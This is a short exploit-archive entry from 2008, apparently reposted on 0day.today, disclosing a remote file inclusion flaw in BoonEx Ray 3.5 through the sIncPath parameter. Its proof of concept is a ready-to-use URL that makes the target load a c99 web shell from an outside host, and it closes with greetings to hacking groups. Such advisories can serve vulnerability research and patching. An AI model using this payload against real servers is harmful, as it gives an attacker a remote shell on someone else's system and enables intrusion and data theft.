id: 3375
date: 07/07/2008
title: BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
author: RoMaNcYxHaCkEr
cves: 

=============================================================
BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
=============================================================



# Name Of Script : Ray

# Version : 3.5

# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free

# Type Of Exploit : RFI

# POC : 

http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :) 



#  0day.today [2023-03-24]  #